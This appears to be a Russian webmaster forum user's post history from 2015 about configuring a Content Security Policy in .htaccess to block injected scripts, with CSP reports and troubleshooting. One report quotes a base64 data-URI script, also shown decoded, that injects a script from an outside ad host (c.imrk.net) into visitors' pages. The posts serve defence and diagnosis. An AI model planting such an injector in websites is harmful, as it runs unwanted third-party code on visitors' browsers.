FinN73

Рейтинг
33
Регистрация
12.12.2012
Блок "Поделиться". Тормозит счётчик.

Я заметил, что ночью работают одноклассники...

divv,

Возможно...

Настройка CSP - Content Security Policy

Ladycharm,

А можно по подробнее про эти директивы?

P.S. На русском:)

---------- Добавлено 16.03.2015 в 02:02 ----------

Ladycharm,

А можно по подробнее про эти директивы?

P.S. На русском:)

Настройка CSP - Content Security Policy

Дело в том, что я поставил CSP вчера и не было ни одного захода по этим ссылкам. Уже обрадовался. А сегодня появились снова:(

Думаю, нашли способ как обойти CSP..?

Настройка CSP - Content Security Policy

Ladycharm

Ну в общем то ничего не блокируется, только одну картинку нашел, которая не грузится, из-за не правильного пути в коде сайта:)

Теперь другой вопрос:

Снова вылез в стате этот сайт: pozitivrekl.ru

Даже после установки CSP. Я один такой или есть еще у кого он?

Настройка CSP - Content Security Policy
Ladycharm:
CSP заблокировала нечто вроде <frame src='data:base64; ab4KlXft...', только в нормальном отчёте должна быть полная data:
"blocked-uri":"data:base64; ab4KlXft..."

Зайдите на страницу из "document-uri":"http://www.мойсайт.net/каталог/27898-страница.html" и посмотрите есть ли блокировка CSP в консоли браузера. Если нет - 99.9% что CSP заблокировала то, что надо.

Что значит нормальный отчет?

И как узнать из консоли есть ли блокировка?

Так то зашел, посмотрел, ничего вроде визуально не заблокировалось.

Извините, за столько вопросов. Ноль еще в этом, очень хочется понять

Настройка CSP - Content Security Policy

":"blocked-uri":"data:text/javascript;base64


dmFyIFBTdGlkPSI5NzM5IixQU3NpemU9InJtcmVkIjsKKGZ1bmN0aW9uKCl7aWYoLTE9PSJ5YW5kZXgucnUgdmsuY29tIGdvb2dsZS5ydSBnb29nbGUuY29tIG1haWwucnUgeW91dHViZS5jb20gZmFjZWJvb2suY29tIG9kbm9rbGFzc25pa2kucnUgd2lraXBlZGlhLm9yZyBsaXZlam91cm5hbC5jb20gdHdpdHRlci5jb20gcmJjLnJ1IHNiZXJiYW5rLnJ1IHJhbWJsZXIucnUgbGVudGEucnUgaGFicmFoYWJyLnJ1IHdlYm1vbmV5LnJ1IHJpYS5ydSBraW5vcG9pc2sucnUgaW5zdGFncmFtLmNvbSBnaXNtZXRlby5ydSBibG9nc3BvdC5ydSBoaC5ydSB2ZXN0aS5ydSBzYXBlLnJ1IHNlYXJjaGVuZ2luZXMuZ3VydSBvay5ydSBwci1jeS5ydSBnYXpldGEucnUgeWEucnUgZHJvbS5ydSB5YWhvby5jb20gZWNoby5tc2sucnUgeWFkaS5zayBsaWZlbmV3cy5ydSB3bW1haWwucnUgbWlyYWxpbmtzLnJ1IG1pY3Jvc29mdC5jb20gbmljLnJ1IG50di5ydSBpbnRlcmZheC5ydSBnYW1lcy5tYWlsLnJ1IGxlbnRhLnJ1IHJnLnJ1IGRyaXZlMi5ydSIuc3BsaXQoIiAiKS5pbmRleE9mKGxvY2F0aW9uLmhvc3QpKXt2YXIgYT1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTsKYS5zZXRBdHRyaWJ1dGUoInR5cGUiLCJ0ZXh0L2phdmFzY3JpcHQiKTthLnNldEF0dHJpYnV0ZSgic3JjIiwiaHR0cDovL2MuaW1yay5uZXQvdGFnLzEuanMiKTtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpfX0pKCk7Cg=="
Настройка CSP - Content Security Policy

Вот что нашел еще в репорте:

dmFyIFBTdGlkPSI5NzM5IixQU3NpemU9InJtcmVkIjsKKGZ1bmN0aW9uKCl7aWYoLTE9PSJ5YW5kZXgucnUgdmsuY29tIGdvb2dsZS5ydSBnb29nbGUuY29tIG1haWwucnUgeW91dHViZS5jb20gZmFjZWJvb2suY29tIG9kbm9rbGFzc25pa2kucnUgd2lraXBlZGlhLm9yZyBsaXZlam91cm5hbC5jb20gdHdpdHRlci5jb20gcmJjLnJ1IHNiZXJiYW5rLnJ1IHJhbWJsZXIucnUgbGVudGEucnUgaGFicmFoYWJyLnJ1IHdlYm1vbmV5LnJ1IHJpYS5ydSBraW5vcG9pc2sucnUgaW5zdGFncmFtLmNvbSBnaXNtZXRlby5ydSBibG9nc3BvdC5ydSBoaC5ydSB2ZXN0aS5ydSBzYXBlLnJ1IHNlYXJjaGVuZ2luZXMuZ3VydSBvay5ydSBwci1jeS5ydSBnYXpldGEucnUgeWEucnUgZHJvbS5ydSB5YWhvby5jb20gZWNoby5tc2sucnUgeWFkaS5zayBsaWZlbmV3cy5ydSB3bW1haWwucnUgbWlyYWxpbmtzLnJ1IG1pY3Jvc29mdC5jb20gbmljLnJ1IG50di5ydSBpbnRlcmZheC5ydSBnYW1lcy5tYWlsLnJ1IGxlbnRhLnJ1IHJnLnJ1IGRyaXZlMi5ydSIuc3BsaXQoIiAiKS5pbmRleE9mKGxvY2F0aW9uLmhvc3QpKXt2YXIgYT1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTsKYS5zZXRBdHRyaWJ1dGUoInR5cGUiLCJ0ZXh0L2phdmFzY3JpcHQiKTthLnNldEF0dHJpYnV0ZSgic3JjIiwiaHR0cDovL2MuaW1yay5uZXQvdGFnLzEuanMiKTtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpfX0pKCk7Cg=="

Вот как выглядит после раскодировки:

var PStid="9739",PSsize="rmred";

(function(){if(-1=="yandex.ru vk.com google.ru google.com mail.ru youtube.com facebook.com odnoklassniki.ru wikipedia.org livejournal.com twitter.com rbc.ru sberbank.ru rambler.ru lenta.ru habrahabr.ru webmoney.ru ria.ru kinopoisk.ru instagram.com gismeteo.ru blogspot.ru hh.ru vesti.ru sape.ru searchengines.guru ok.ru pr-cy.ru gazeta.ru ya.ru drom.ru yahoo.com echo.msk.ru yadi.sk lifenews.ru wmmail.ru miralinks.ru microsoft.com nic.ru ntv.ru interfax.ru games.mail.ru lenta.ru rg.ru drive2.ru".split(" ").indexOf(location.host)){var a=document.createElement("script");

a.setAttribute("type","text/javascript");a.setAttribute("src","http://c.imrk.net/tag/1.js");document.body.appendChild(a)}})();

"

Что это значит? Может найдется, кто подскажет?

Настройка CSP - Content Security Policy

Ребят, помогите понять, что значит этот репорт:

":"document-uri":"http://www.мойсайт.net/каталог/27898-страница.html"
"referrer":"http://www.мойсайт.net/каталог/"
"violated-directive":"frame-src 'self' https://vk.com *.vk.com yastatic.net *.yastatic.net https://yastatic.net chatovod.ru *.chatovod.ru мойсайт.net *.мойсайт.net www.мойсайт.net connect.mail.ru googleads.g.doubleclick.net vk.com"
"original-policy":"default-src 'self' мойсайт.net *.мойсайт.net www.мойсайт.net *.yandex.ru; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://vk.com chatovod.ru *.chatovod.ru yastatic.net *.yastatic.net https://yastatic.net http://c6.cllvw.pw cllvw.pw *.cllvw.pw мойсайт.net *.мойсайт.net www.мойсайт.net vk.com https://ajax.googleapis.com ajax.googleapis.com yastatic.net v.gfhdkse.com *.gfhdkse.com www.liveinternet.ru counter.yadro.ru radarurl.com mc.yandex.ru https://mc.yandex.ru schema.org; object-src 'self' мойсайт.net *.мойсайт.net www.мойсайт.net www.gstatic.com vk.com; style-src 'self' 'unsafe-inline' chatovod.ru *.chatovod.ru yastatic.net *.yastatic.net https://yastatic.net мойсайт.net *.мойсайт.net www.мойсайт.net; img-src 'self' data: *.fastpic.ru chatovod.ru *.chatovod.ru yastatic.net *.yastatic.net https://yastatic.net radarurl.com *.radarurl.com мойсайт.net *.мойсайт.net www.мойсайт.net vk.com yastatic.net www.liveinternet.ru counter.yadro.ru mc.yandex.ru www.google-analytics.com https://www.google-analytics.com v.gfhdkse.com radarurl.com schema.org screenlist.ru; media-src 'self' мойсайт.net *.мойсайт.net www.мойсайт.net vk.com; frame-src 'self' https://vk.com *.vk.com yastatic.net *.yastatic.net https://yastatic.net chatovod.ru *.chatovod.ru мойсайт.net *.мойсайт.net www.мойсайт.net connect.mail.ru googleads.g.doubleclick.net vk.com; font-src 'self' мойсайт.net *.мойсайт.net www.мойсайт.net https://ajax.googleapis.com ajax.googleapis.com; report-uri http://www.мойсайт.net/csp.php;"
"blocked-uri":"data"
"status-code":200

?

Настройка CSP - Content Security Policy
Ladycharm:
По той ссылке - CSP в формате "для людей", в формате файла .htaccess она будет выглядеть так: 

Header set Content-Security-Policy "\

default-src 'self';\

img-src 'self';\

style-src 'self';\

script-src 'self';\

object-src 'self';\

connect-src 'self';\

frame-src 'self';\

font-src 'self';\

report-uri http://site.ru/csp.php;"
Или вместо переносов \ надо вытянуть всё в одну строку: 
Header set Content-Security-Policy "default-src 'self'; img-src 'self'; style-src 'self'; script-src 'self'; object-src 'self'; connect-src 'self'; frame-src 'self'; font-src 'self'; report-uri http://site.ru/csp.php;"

(что будет неудобно в работе). Хотя был один хостер, у которого пришлось вытягивать всё в одну строку, тк htaccess не понимал переноса на следующую строку по \.


PS: Internal Server Error 500/502 - ошибка в синтаксисе .htaccess, так же бывает при превышении размера заголовков свыше лимита, установленного в настройках Apache.

А как узнать лимит? В каком файле можно глянуть?

Я пробовал с "\" и в одну строку, все так же.

---------- Добавлено 13.03.2015 в 01:35 ----------

FinN73:
А как узнать лимит? В каком файле можно глянуть?
Я пробовал с "\" и в одну строку, все так же.

Сори, в одну строку все пошло! Спасибо!

---------- Добавлено 13.03.2015 в 01:50 ----------

Вот только теперь перестало показываться сколько человек добавило сайт в соц закладки, ставлю yastatic.net *.yastatic.net https://yastatic.net в картинках и в скриптах и все равно не показывает.

---------- Добавлено 13.03.2015 в 01:51 ----------

В папку ничего не записывается. Только одна какая то папка создалась и все...

---------- Добавлено 13.03.2015 в 01:53 ----------

тьфу блин, создаются:) Нужно было обновить...))

---------- Добавлено 13.03.2015 в 02:08 ----------

Так, с этим разобрались. А вот что делать с этим мусором в папке? Это что вообще такое?

Настройка CSP - Content Security Policy

Привет всем! Сделал по этому способу: /ru/forum/comment/13456921

Но после того как вставляю код в .htaccess сервак выдает ошибку:


Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, admin@мой сайт.net and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Подскажите пожалуйста, что не так делаю?

1 234 5
Всего: 43